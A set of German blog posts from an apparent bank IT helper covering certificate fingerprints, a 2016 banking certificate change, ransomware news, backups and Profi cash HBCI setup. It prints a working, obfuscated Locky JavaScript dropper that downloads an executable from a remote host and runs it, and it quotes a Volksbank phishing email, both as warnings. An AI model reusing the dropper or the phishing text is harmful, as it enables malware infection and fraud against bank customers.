fingerprint
Die wichtigsten Details des Zertifikats der Adresse
EBICS.MULTIVIA-SUITE.DE

Überprüft durch: VR IDENT SSL CA 2016
Läuft ab: 14.04.2019
Organisation FIDUCIA & GAD IT AG
Zertifikat-Fingerabdruck SHA1: 
3E 53 CC 01 89 7C 89 65 FC EC BA 0B 04 B1 25 6A 5C 84 8F 84
SHA256:
33 54 99 8C DA 8A A8 EB 98 B6 BC 61 F8 62 39 90
35 1F 4E B2 8D 63 D1 C2 64 A2 51 85 BD 11 7F DF

Am Freitag hatte der Admin frei, am Samstag war dann Samsa da?Malware-Warnsymbol_rot_gluehend

Bei den aufgedeckten Fällen mit dieser Erpressersoftware wird offensichtich  viel „per Hand“ erledigt, der Einbruch in das Netzwerk und auch die Verschlüsselung des Systems erfolgt gezielt manuell.

Bei dem Aufwand ist auch die Lösegeldforderung höher – 50 Bitcoins für die Entsperrung des gesamten Netzes entsprechen heute fast 19.000,00 Euro. Der Einzelrechner ist mit 1,5 BTC dabei. Da sind die 0,5 BTC des Locky-Trojaners ja fast ein Schnäppchen.

Billige, „für alle erschwingliche Massenware“ gegen gezielte individuelle „Kundenbetreuung“ also auch hier 😉

Da fragt man sich, ob nicht gleich noch andere Beute gemacht wird, also z.B. mit Industriespionage und/oder Sabotage. Womöglich ist einem Wettbewerber die noch nicht zum Patent angemeldete Erfindung des Konkurrenten sogar etwas mehr wert als 50 Bitcoins?

Wer sich übrigens für die Erträge der Erpresser interessiert: Die Transaktionen von Bitcoinzahlungen sind ja nachvollziehbar, auch wenn die Eigentümer der Wallets nicht bekannt sind.

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-mit-neuer-Taktik-Erst-schauen-dann-verschluesseln-3153767.html

Schloss-goldAm 04.04.2016 werden Verschlüsselungs-Zertifikate am FinTS/HBCI-Server für den PIN&TAN-Zugang unter gad.de getauscht. >>allgemeine Info

Da die VR-NetWorld Software die Zertifikate selbst verwaltet und sich nicht auf das Betriebssystem verlässt, muss der Zertifikatsbestand auf dem aktuellen Stand sein, wenn Sie ein Konto einer Bank mit  PIN&TAN führen.

Online Updates erhalten Sie für: Versionen ab 5.20 und 6.0

Sie benötigen mindestens Version 5.22 Build 13.

VRNWS_update_Build13

Veraltete Versionen:

VR-NetWorld Version 4.x wird nicht mehr aktualisiert. Neben dem Zertifikatsspeicher fehlen wichtige SEPA-Updates, deshalb kann der Betrieb nicht mehr sichergestellt werden.

Version 5.x erhält mit dem Zertifikatsupdate ebenfalls die letzte Aktualisierung. Je nach Lizenzmodell der Bank erfolgt die Aktualisierung auf unterschiedliche Weise.

Hier sind ggf. Lizenzen oder ein Programmwechsel nötig, bitte sprechen Sie mit Ihrem Lizenzgeber.

Kundinnen und Kunden der GLS Bank können unter gls-laden.de eine aktuelle Lizenz Version 6 erwerben.

 

 

Die Spirale der veröffentlichten sogenannten „Erpressungs-Trojaner“ dreht sich weiter und augenscheinlich immer schneller:

Malware-Warnsymbol_rot_gluehendDie gerade neu entdeckte Schadsoftware „PowerWare“ vermeidet das Nachladen verdächtiger Dateien komplett. Sie nutzt vollständig die im Windows vorhandenen System-Programme und muss sich dann nur noch mit Verschlüsselungs-Schüsseln online versorgen. Damit vermeidet sie die Entdeckung durch Antiviren-Programme, die sich bisher gut an solchen Nachladeroutinen orientieren konnten. Auch die Verschlüsselung wird komplett Windowsroutinen überlassen, die Prozesse finden quasi im „erlaubten Bereich“ statt.

Quelle:
http://www.heise.de/newsticker/meldung/Neue-Infektions-Masche-Erpressungs-Trojaner-missbraucht-Windows-PowerShell-3151892.html

Offensichtlich geht es in die nächste Eskalationsrunde: Bisher verschlüsselten die Ransomwaretrojaner nur einzelne Dateien, jetzt schließen Sie die gesamte Festplatte weg, so dass der Computer nicht mehr nutzbar ist.

Malware-Warnsymbol_rot_gluehendMir ist bisher nicht klar, ob dies sogar fremde Partitionen einschließt, so dass eine parallele Nutzung von z.B. Windows mit Linux oder auch Mac mit Parallels/Windows eine Gefahr für das gesamte System darstellt.

Backups werden also noch wichtiger, wenn man auf ein funktionsfähiges Computersystem angewiesen ist. Es kann sich lohnen, einen Zweitrechner in Petto zu haben. Ich denke da  z.B. an Leasingrückläufer, die zwar ein paar Jahre auf dem Buckel haben, aber als Bürorechner mit aktuellem Windows-System sehr gute Dienste leisten können.

Quelle:
http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html


Ergänzung:

Zitat: UEFI-Systeme lassen sich retten

Die Sicherheitsforscher bestätigen die Erkenntnisse von heise Security, dass nur Systeme mit MBR verschlüsselt werden.

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-Neue-Infektionswelle-rollt-an-Verschluesselung-bisher-nicht-knackbar-3160177.html

Update 2: Daten wiederherstellen, Entschlüsselung möglich:

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-geknackt-Passwort-Generator-veroeffentlicht-3167064.html

zuletzt geändert: 07.04.2016

Schloss_kaputtVeralteter Inhalt. Die gad.de Adressen gelten nicht mehr für FinTS, nur noch Adressen mit atruvia sind nutzbar seit 03.2024

Am Montag, 04.04.2016 wurden gegen 13.00 Uhr Verschlüsselungs-Zertifikate am FinTS/HBCI- PIN/TAN und EBICS-Server unter gad.de getauscht. Die Zertifikate für das Onlinebanking per Browser wurden bereits eine Woche vorher gewechselt. Der technische Hintergrund ist ein Wechsel der Root-Zertifikatsstruktur.

Leider wurden die betroffenen Banken erst sehr spät informiert.

Die Listen und Informationen werde ich aktualisieren, sobald mir weitere Details bekannt werden.

Nicht betroffen sind
User des FinTS/HBCI-Verfahrens mit Signaturdatei („HBCI-Classic“) und/oder Chipkarte (Kartenleser mit USB-Anschluss).

Konnten Sie seit Montag, 04.04.  ab 14.00 Uhr noch erfolgreich Daten übertragen, also beispielsweise Kontoumsätze abholen, dann benötigen Sie kein Update! Sollten Sie trotzdem Fehler erhalten, liegt es an etwas anderem.

Ebenfalls nicht betroffen sind alle ddbac-Programme (GLS eBank/windata, Quicken, Lexware, Wiso etc.) aber auch  Apps wie GLS mBank, Banking4 von subsembly und outbank verlassen sich auf das Betriebssystem und sollten keine Probleme verursachen, sofern dieses aktuell ist (s.u.). Mac, iOs und Linux-Programme arbeiten entsprechend und sollten ebenfalls wenig Probleme verursachen.
Es kann sein, dass Sie nach einer Bestätigung des Fingerprints des Zertifikats gefragt werden.

Programme, die eigene Zertifikatsverwaltungen nutzen, benötigen Programmupdates für das PIN und TAN bzw. EBICS-Verfahren .

Dies sind in erster Linie (klicken Sie ggf. auf den Link):

Bevor Sie Maßnahmen ergreifen und Aktualisierungen durchführen: Erstellen Sie eine frische Datensicherung Ihres Datenbestandes.

erste_Hilfe


SFIRM32
Dazu schreibt der Hersteller:
http://www.sfirm.de/nc/aktuelle-meldungen/aktuelles/article/hinweise-zum-austausch-der-ssl-zertifikate-der-gad.html

Für Version 2.5 gibt es also nur den Wechsel auf die neue Version 3.x. oder der Wechsel der Programm-Plattform auf eine Alternativ-Software.


Rufzeichen_60Für Starmoney 9 und 10 und die aktuelle Version von Starmoney-Business stehen seit dem 23.03. Onlineupdates bereit, die den Lizenzspeicher auf den aktuellen Stand bringen.


alte Betriebssysteme

Bei Windows-XP und alten Serverversionen bin ich mir nicht sicher, ob die Updates oder Datenübertragungen durchgeführt werden können.

Ein Wechsel ist hier allein aus Sicherheitsgründen dringendst angeraten!


Zertifikatsprüfung, Fingerprint:fingerprint

Einige Programme ermöglichen/fragen nach einer manuellen Zertifikatsprüfung und Bestätigung des Hashwertes der öffentlichen Schlüssel. Insbesondere wird dies wahrscheinlich bei einigen Installationen von aqfinance (gnucash) und Hibiscus (jverein/jameica) und ggf. pecunia Banking (mac) nötig sein. Den Fingerabdruck können Sie über den Browser gegenprüfen. Lesen Sie hier mehr.

Digitale Erpressung ist für die Betrüger äußerst lukrativ und wir stehen vermutlich erst am Beginn einer Welle von Erpressungstrojanern, die neuesten Varianten dieser Viren sind vermutlich so gut Security-Shieldsprogrammiert, dass eine Entschlüsselung nicht mehr möglich ist. >Heise über PGP-Trojaner

Regelmäßig durchgeführte und geeignete Datensicherungsstrategien (Backups) sind absolut notwendig, wenn man wichtige Daten mit digitaler Technik verwaltet und mehr und mehr von der Technik abhängig wird.

Worst Case Szenario – was wäre wenn?

Ich halte folgendes regelmäßiges Gedankenspiel für sehr wichtig:

  • Was passiert im schlimmsten Fall mit meiner Arbeit/meinem Hobby oder meinem Betrieb/meinem Verein, wenn mir mein Arbeitssystem komplett abhanden kommt (Diebstahl, Brand im Serverraum)?
  • Kann ich sicherstellen, dass ich in der gewünschten Zeit wieder arbeitsfähig bin?
  • Was kostet mich der Aufwand?
  • Wie groß wäre der potentielle finanzielle oder zeitliche Schaden?
  • Habe ich Ausweichmöglichkeiten?
  • Könnte der Diebstahl Auswirkungen auf Zugänge haben und könnte ich diese schnell genug sperren, Passwörter ändern?
  • Hat sich nach meinem letzten Gedankenspiel wesentliches geändert, ist Hard- und Software noch zeitgemäß und kostengünstig ersetzbar?
  • Stimmen die Verträge mit meinen Dienstleistern noch und sind sie angemessen?

Gedankenspiele reichen nicht, Testen ist wichtig

Man muss regelmäßig testen, ob die Sicherungsmaßnahmen ausreichen und funktionieren, die man getroffen hat. Was nützt mir beispielsweise ein perfekt durchorganisiertes und zuverlässiges Bandsystem, wenn ich es an keinem Ersatz-Computer mehr installieren und an Laufen bringen kann. Oder wenn die alte Software auf einem aktuellen Betriebssystem nicht mehr funktioniert? Oder im Betrieb: Wenn die Leute, die sich mit der Rücksicherung einer Datenbank auskennen, bereits in Rente oder woanders beschäftig sind?


Was Sie zur Vorsorge wg. der aktuellen Bedrohungen machen sollten, können Sie hier lesen:

http://www.heise.de/newsticker/meldung/Krypto-Trojaner-Locky-Was-tun-gegen-den-Windows-Schaedling-3112408.html

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-fernhalten-Mit-Windows-Bordmittel-Makros-in-Office-2016-global-verbieten-3149377.html

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Surprise-verbreitet-sich-anscheinend-ueber-TeamViewer-3148863.html

http://www.heise.de/thema/Ransomware

Über den Unsinn mit der Mail von „den unbekannten Absendern“.


Ergänzung: Es gibt ein Tool im Betastadium (aktuell nicht für den produktiven Betrieb empfohlen), das auf das typische Verhalten der Verschlüssellung reagiert und den Prozess anhält und Alarm schlägt:
http://www.heise.de/newsticker/meldung/Krypto-Trojaner-Locky-Batch-Dateien-infizieren-Windows-Tool-verspricht-Schutz-3118188.html

Das Tool ist nur ein Hilfsmittel und kein Ersatz für eine regelmäßige Datensicherung.

Update (04.07.2016):
Heise: Gratis Tools entschlüsseln diverse Erpressungs-Trojaner

Die mir zugeschickte vermeintliche Rechnung oder das Fax enthält einen Anhang, der mit knapp über 700 Bytes (!)  einfach zu klein für ein PDF ist.

Was ist da los? Kein Virenscanner erkennt die zip Datei und den Javascript-Inhalt als Container einer Virendatei? Keiner von 54 Scannern auf Virustotal schlägt Alarm? Mein Kollege spekulierte gar nicht so abwegig: Das ist bestimmt der Bundestrojaner, der kommt „von oben“ und wird halt nicht erkannt.

Der Anhang enthält eine Javascript-Datei, die offeniichtlich  eine mit Unicode-verschleierte Webseite nachladen will. Sehr perfide, sehr geschickt.

Glaubt man den aktuellen Zahlen, werden pro Stunde 5000 Rechner in Deutschland vom enthaltenen Locky-Virus infiziert. Die Ransomware verschlüsselt die erreichbaren Dateien und man erhält  nur durch Zahlung eines Lösegeldes wieder die Ursprungsdateien zurück.

Siehe auch:
http://www.golem.de/news/ransomware-locky-kommt-jetzt-auch-ueber-javascript-1602-119331.html
Erpressungstrojaner Tesla (intern vrkennung.de)

Bildschirmfoto_2016-02-24_21-07-26

 

Die Verschleierung ist kein neues Thema:
http://www.heise.de/security/meldung/Rueckwaerts-wird-ein-Virus-draus-1242127.html

Code des Anhangs ( Javascript Datei hier als einfacher Text dargestellt und deshalb harmlos):

var fawqAx= this[‚\u0041c\u0074i\u0076\u0065XO\u0062je\u0063t‘];
var laMhHYOhH = new fawqAx(‚\u0057S\u0063r\u0069\u0070\u0074\u002E\u0053\u0068e\u006C\u006C‘);
var uDsEft = laMhHYOhH[‚\u0045x\u0070\u0061\u006E\u0064Envir\u006Fn\u006De\u006E\u0074S\u0074\u0072in\u0067s‘](‚\u0025TE\u004DP\u0025‘) + ‚\u002F\u0068\u0055O\u0048Mma\u0069n.\u0065x\u0065‘;
var nheEANo = new fawqAx(‚\u004D\u0053XM\u004C\u0032.X\u004D\u004C\u0048TT\u0050‘);
nheEANo[‚\u006Fn\u0072\u0065\u0061\u0064y\u0073\u0074\u0061\u0074ec\u0068\u0061\u006E\u0067e‘] = function() {
if (nheEANo[‚\u0072\u0065a\u0064\u0079\u0073t\u0061\u0074\u0065‘] === 4) {
var RxgIdfvB = new fawqAx(‚\u0041\u0044\u004F\u0044\u0042.S\u0074\u0072\u0065\u0061\u006D‘);
RxgIdfvB[‚op\u0065\u006E‘]();
RxgIdfvB[‚\u0074\u0079pe‘] = 1;
RxgIdfvB[‚\u0077ri\u0074\u0065‘](nheEANo[‚\u0052es\u0070\u006F\u006E\u0073e\u0042\u006F\u0064\u0079‘]);
RxgIdfvB[‚\u0070os\u0069\u0074\u0069\u006F\u006E‘] = 0;
RxgIdfvB[‚\u0073av\u0065\u0054o\u0046\u0069le‘](uDsEft, 2);
RxgIdfvB[‚\u0063lo\u0073\u0065‘]();
};
};
try {
var    HYOAzVaz = ‚R\u0075n‘;
nheEANo[‚\u006F\u0070en‘](‚GE\u0054‘ , ‚h\u0074\u0074p://\u0068t\u0074\u0070\u003A\u002F\u002F\u0066i\u0072\u0073t\u0063o\u0070\u0079\u006Dall\u002E\u0063\u006F\u006D/\u0073\u0079\u0073t\u0065m\u002F\u006Co\u0067\u0073\u002F\u0038\u0037h7\u00354‘, false);
nheEANo[‚\u0073e\u006Ed‘]();
laMhHYOhH [HYOAzVaz](uDsEft, 1, false);
} catch (ajg9ggxFs) {};

Die Betrugsmail ist in beinahe perfektem Deutsch geschrieben, enthält das typische VR-Logo und ist doch ein Betrugsversuch. Der Link verweist glücklicherweise auf auf eine Seite, die nicht mehr existiert, aber dies kann sich ja schnell ändern.

Man beachte die Anrede. der Absender lautet info@volksbank.de

Wichtig: neue Sicherheits-Software Update

Sehr geehrter Herr Sichmann,

uns bei der Volksbank liegt die Sicherheit und Integrität unserer Konten sehr am Herzen.

Leider wurde diese Sicherheit in den letzten Wochen stark gefährdet. Viele unserer Kunden sind Opfer von Cyberkriminellen und Hackern geworden.

Um dieses Problem so schnell und effizient wie möglich zu beseitigen, haben wir eine
neue Sicherheits-Software entwickelt, die unseren Online-Konten mehr
Sicherheit gibt und unsere Kunden vor solchen Übergriffen beim Online-Banking schützt.
Gerade arbeiten wir daran, diese Software auf den Online-Konten aller Kunden zu installieren.

Bitte klicken Sie zur Verifizierung auf folgenden [link entfernt und Wort Link fehlt]

Wir bedanken uns für Ihre Mitarbeit

Mit freundlichen
Grüßen,

Ihr Volksbank-Kundenservice


Bundesverband der Deutschen Volksbanken und Raiffeisenbanken e.V. (BVR)
Schellingstraße 4
10785 Berlin
©Volksbanken und Raiffeisenbanken 1998-2014. Alle Rechte vorbehalten

letzte Änderungen 18.10.2022
Suchwort: #Profi-neue-hbci-Datei

Da ein Programm üblicherweise nicht weiß, wer gerade an der Tastatur sitzt und aus Sicherheitsgründen auch eine eigene Passwortverwaltung hat, dient in Profi cash die Benutzerverwaltung auch zur Zuordnung der Bankzugangsdaten. Die meisten Banken verwalten Bankzugänge personenbezogen. Üblicherweise reicht dann eine elektronische Unterschrift, um alle Konten einer Bank zu erreichen.

Mehrere Firmen:
Wenn Sie mehrere Firmen in Profi cash nutzen, darunter versteht Profi cash die Mandantenfähigkeit, also mehrere getrennt administrierbare Datenbanken, dann müssen Sie die Sicherheitsdatei nur einmal neu erzeugen. In den anderen Firmen lesen Sie die vorhandene Datei ein. Die Benutzer müssen aber in jeder Firma angelegt werden.

Neue Benutzer für Profi cash
neue Benutzer: Profi cash verwaltet die Bankzugänge also über die Benutzer/in. Die Benutzer legt der Master an, er hat die Rechte dazu. Bitte melden Sie sich als master in der Firma an und legen Sie die gewünschten Anwender in der Software an. Sie finden die Menü-Berechtigungen und Kontoberechtigungen unter „Stammdaten“, „Anwenderverwaltung“.

Jeder neue Benutzer meldet sich anschließend separat an und ändert das  bei neuen Zugängen mit dem Passwort „system“ und muss dann ein eigenes Passwort angeben.

Dieses Passwort ist das Zugriffspasswort für die Software, es sollte nicht mit dem Bank-Passwort übereinstimmen.

Melden Sie sich mit Ihrem Benutzer in Profi cash an.

Profi cash 11

Nach der Anmeldung erfolgt in Profi cash 11 die Anlage des HBCI-Zuganges im Menü Stammdaten/HBCI-Verwaltung.

Wählen Sie oben rechts den Button „neu…“ an oder „Bearbeiten“, wenn bereits ein Zugang existiert. Tragen Sie oben ein neues Kürzel ein, z.B. Bankname Vorname, das Programm erzeugt automatisch einen neuen Datensatz (der Button „Leeren-Neu“ bewirkt das gleiche) wie ein neuer Eintrag. Wählen Sie als Sicherheitsverfahren „Sicherheitsdiskette/Sicherheitsdatei“ aus.

Geben Sie dann die BLZ  ein und wählen dann das nächste Feld an. Sie benötigen die Benutzerkennung, beginnend mit 672… Profi cash fragt zum Teil noch die VR-Kennung im zweiten Feld ab, lassen Sie das Feld einfach frei oder tragen Sie die Benutzerkennung auch hier ein. Das Passwortfeld lassen Sie bitte ebenfalls frei. Sie sollten es nicht speichern. Sinnvoll kann dies nur in perfekt abgesicherten Systemen sein oder z.b. bei automatischem Abruf mit eingeschränkten Berechtigungen.

Spätestens jetzt sollten Sie den USB-Stick oder einen anderen Wechseldatenträger einstecken und den Drucker einschalten. Das Programm führt Sie durch die weitere Anlage und bietet Ihnen den Pfad zum Speichern der neuen Schlüsseldatei an, sofern dieser nicht bereits festgelegt war.

Wenn Sie keinen Stick griffbereit haben, können Sie auch übergangsweise die Festplatte oder einen anderen Pfad angeben. Sie erhalten dann einen Sicherheitshinweis. Bei der Passwortvergabe müssen Sie sich ein individuelles Passwort ausdenken, das Sie sich gut merken können. Es spricht nichts dagegen, wenn Sie das Passwort notieren, wenn niemand anders Zugriff darauf hat.

Die Bank kennt dieses Passwort nicht, es dient zur Sicherung der Schlüsseldatei. Es muss eins der erlaubten Sonderzeichen beinhalten und min. 8 Zeichen lang sein. Bei der ersten Datenübertragung wird der Hash (eine Art Prüfsumme) des Bankschlüssels zur Prüfung angezeigt. Sie sollten diesen in den Unterlagen finden oder hier vergleichen.

Der Hashwert – eine Art  Prüfsumme für eine wesentlich größere Zahl – wird errechnet und angezeigt. Vergleichen Sie diesen mit den Unterlagen Ihrer Bank. Bei der GLS Bank  lautet dieser

69 F2 B5 D0 A6 64 D5 2E F0 43 A0 35 4D BD 65 88

48 89 1A 1A 23 85 A1 B1 AE 55 00 8A 2F F4 99 9D

Das Prinzip: Ändert sich nur eine einzige Stelle des Schlüssels, so wird ein vollkommen anderer Hash errechnet und angezeigt, so dass man Manipulationen sofort erkennt. Am Ende erfolgt der Druck des sogenannten INI-Briefes. Senden Sie diesen bitte an die Bank. Den Druck können Sie wiederholen unter Datei/Protokolle/Druck wiederholen. Führen Sie das Menü zu Ende.

Profi cash 12

In Profi cash 12 nutzen Sie das Menü „Einstellungen“ und den Button HBCI-Verwaltung im Menü-Band .

Wählen Sie oben rechts den Button „neu anlegen“. Wählen Sie als Sicherheitsverfahren „Sicherheitsdatei“ aus.

Tragen Sie oben ein neues Kürzel ein, z.B. Bankname Vorname, das Programm erzeugt automatisch einen neuen Datensatz (der Button „Leeren-Neu“ bewirkt das gleiche) wie ein neuer Eintrag. Wählen Sie als Sicherheitsverfahren „Sicherheitsdiskette/Sicherheitsdatei“ aus.

Jetzt sollten Sie den USB-Stick oder einen anderen Wechseldatenträger einstecken.

Je nachdem, ob Sie eine neue Sicherheitsdatei erzeugen wollen oder eine bereits vorhandene Sicherheitsdatei in der Firma/in Profi cash anmelden möchten wählen Sie den Button an.

Mit Klick auf den „drei-Punkte-Button“ öffnen Sie den Dateidialog zur Auswahl des Pfades. Einen Dateinamen können Sie nicht anlegen, aber einen neuen Ordner.

 

Der Pfad wird übernommen.

Klicken Sie auf weiter. Wenn Sie keinen Wechseldatenträger gewählt haben, sehen Sie ein Hinweisfeld.

Geben Sie dann die BLZ  ein und wählen dann das Feld an und klicken Sie auf „Weiter“. Die Zugangsadresse sollte automatisch gefüllt sein.

Sie benötigen die Benutzerkennung, beginnend mit 672… Profi cash fragt zum Teil noch die VR-Kennung im zweiten Feld ab, lassen Sie das Feld einfach frei oder tragen Sie die Benutzerkennung auch hier ein.

Das Passwortfeld lassen Sie bitte ebenfalls frei. Sie sollten es nicht speichern, denn dann reicht das Profi cash Passwort und der Stick, um Buchungen auszuführen. Sinnvoll kann dies nur in perfekt abgesicherten Systemen sein oder z.b. bei automatischem Abruf mit eingeschränkten Berechtigungen.

Geben Sie ein sinnvolles HBCI-Kürzel ein, gerade wenn Sie mit mehreren Banken arbeiten. Vor einer Buchungs-Freigabe werden Sie aufgefordert, den Datenträger einzustecken, das ist also dann die letzte Chance zur Erkennung, falls Sie sich beim Bankkonto vertan haben. Klicken Sie auf „Fertig stellen“.

Jetzt sollten Sie den Drucker einschalten.

Das Programm führt Sie durch die weitere Anlage und Passwortvergabe.

Die Bank kennt dieses Passwort nicht, es dient zur Sicherung der Schlüsseldatei. Es muss eins der erlaubten Sonderzeichen beinhalten und min. 8 Zeichen lang sein. Bei der ersten Datenübertragung wird der Hash (eine Art Prüfsumme) des Bankschlüssels zur Prüfung angezeigt. Sie sollten diesen in den Unterlagen finden oder hier vergleichen.

Der Hashwert – eine Art  Prüfsumme für eine wesentlich größere Zahl – wird errechnet und angezeigt. Vergleichen Sie diesen mit den Unterlagen Ihrer Bank. Bei der GLS Bank  lautet dieser

69 F2 B5 D0 A6 64 D5 2E F0 43 A0 35 4D BD 65 88 
48 89 1A 1A 23 85 A1 B1 AE 55 00 8A 2F F4 99 9D

Das Prinzip: Ändert sich nur eine einzige Stelle des Schlüssels, so wird ein vollkommen anderer Hash errechnet und angezeigt, so dass man Manipulationen sofort erkennt. Am Ende erfolgt der Druck des sogenannten INI-Briefes. Senden Sie diesen bitte an die Bank. Den Druck können Sie wiederholen unter Datei/Protokolle/Druck wiederholen. Führen Sie das Menü zu Ende.

Wenn Konten bereits vorhanden sind, muss jetzt noch die Zuordnung des neuen HBCI-Zuganges in Profi cash 11 unter Stammdaten/Konten Auftraggeber erfolgen. Wählen Sie oben ein passendes Kontokürzel aus und wählen Sie unten das neue HBCI-Kürzel an. Bestätigen Sie mit „Speichern“. Bei mehreren Konten fragt Profi cash, ob der Zugang bei mehreren Konten genutzt werden soll. In Profi cash 12 heißt das Menü „Einstellungen“ „Auftraggeberkonten bearbeiten“.

Soll der neue Zugang bei mehren Firmen (Datenbanken in Profi cash) zur Anwendung kommen, dann lesen Sie bitte in den folgenden Firmen den Schlüssel aus der Sicherheitsdatei aus und bestätigen Sie die Übernahme.

Eine Benutzerkennung kann bei den genossenschaftlichen Banken nur 1x elektronisch initialisiert werden, eine zweite Verwendung ist nicht möglich. Bitte erstellen Sie daher ein Backup (Sicherheitskopie) Ihrer neuen Schlüsseldatei.

Weitere Sicherheitshinweise:
Die Sicherheitsdatei und das Passwort dürfen nicht in andere Hände geraten. Geben Sie diese niemals an Dritte weiter, auch nicht an Vorgesetzte und Ihren Partner. Sie handeln sonst grob fahrlässig.
Wenn Sie den Verdacht haben, Passwort und Sicherheitsdatei könnte in falsche Hände geraten sein, also wenn wenn Sie z.B. eine Schadsoftware auf Ihrem Rechner oder im Netzwerk entdeckt haben oder wenn Sie gar den Verdacht haben, jemand könnte an Ihre Sicherheitsdatei gelangt sein,  dann müssen Sie bei uns die Schlüssel elektronisch selbst austauschen und sollten anschließend auch Ihr Passwort ändern. Ein neuer Brief an die Bank ist nicht nötig, da die neuen Schlüssel elektronisch mit dem alten Schlüssel freigeschaltet werden können. Nutzen Sie dazu wieder die HBCI-Verwaltung unter Stammdaten, und wählen Sie „Schlüssel ändern“ und lassen Sie sich durch den Prozess führen. Wählen Sie dann auch „Passwort ändern“ aus, um das Zugriffspasswort der Schlüsseldatei zu ändern.

Sicherheitsdatei:

Sie werden es nicht bemerken, wenn die Datei kopiert wurde. Das Passwort kann nahezu unendlich oft durchprobiert werden und ist durch Schadprogramme (Viren) außerdem einfach auszulesen (zur Not wird die Eingabe beobachtet, z.B. mit einer Kamera). Wenn Sie hier den Hauch einer Gefahr sehen, wechseln Sie unbedingt !!! das Verfahren.

Daher sollte die Sicherheitsdatei auch auf einem Wechseldatenträger genutzt werden, den Sie nach dem Gebrauch aus dem Rechner abziehen können.